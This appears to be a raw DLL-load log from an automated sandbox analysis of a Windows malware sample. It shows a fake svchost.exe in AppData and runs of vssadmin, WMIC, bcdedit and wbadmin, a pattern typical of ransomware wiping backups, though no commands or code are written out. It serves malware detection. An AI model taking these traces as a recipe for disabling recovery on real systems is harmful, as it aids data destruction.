                  Source: C:\Users\user\Desktop\main.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: propsys.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: appresolver.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: bcp47langs.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: slc.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: userenv.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: sppc.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\Desktop\main.exe Section loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: version.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: vcruntime140.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: libffi-8.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: iphlpapi.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: libcrypto-3.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: libssl-3.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: mswsock.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: sqlite3.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: dnsapi.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: rasadhlp.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: fwpuclnt.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: textshaping.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: textinputframework.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: coreuicomponents.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: coremessaging.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: ntmarta.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: coremessaging.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\Desktop\Mai.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exe Section loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: vss_ps.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: swprv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: virtdisk.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vss_ps.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wbadmin.exeSection loaded: credui.dll
                  Source: C:\Windows\System32\wbadmin.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbadmin.exeSection loaded: blb_ps.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: virtdisk.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: spp.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netapi32.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: clusapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: wer.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: fveapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: cscapi.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: blb_ps.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: vds_ps.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\wbengine.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\vdsldr.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vdsldr.exeSection loaded: vdsutil.dll
                  Source: C:\Windows\System32\vdsldr.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\vdsldr.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\vdsldr.exeSection loaded: vds_ps.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: osuninst.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: bcd.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: uexfat.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ulib.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ifsutil.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: devobj.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: uudf.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: untfs.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: ufat.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: fmifs.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vds_ps.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsdyn.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsbas.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: vdsvd.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: virtdisk.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: fltlib.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: hbaapi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: wmiclnt.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: iscsidsc.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: iscsium.dll
                  Source: C:\Windows\System32\vds.exeSection loaded: fveapi.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: vssapi.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: vsstrace.dll
                  Source: C:\Windows\System32\vssadmin.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\bcdedit.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\wbadmin.exeSection loaded: credui.dll
                  Source: C:\Windows\System32\wbadmin.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: textinputframework.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coreuicomponents.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: ntmarta.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: coremessaging.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: mrmcorer.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: textshaping.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: efswrt.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: mpr.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: wintypes.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: twinapi.appcore.dll
                  Source: C:\Windows\System32\notepad.exeSection loaded: oleacc.dll
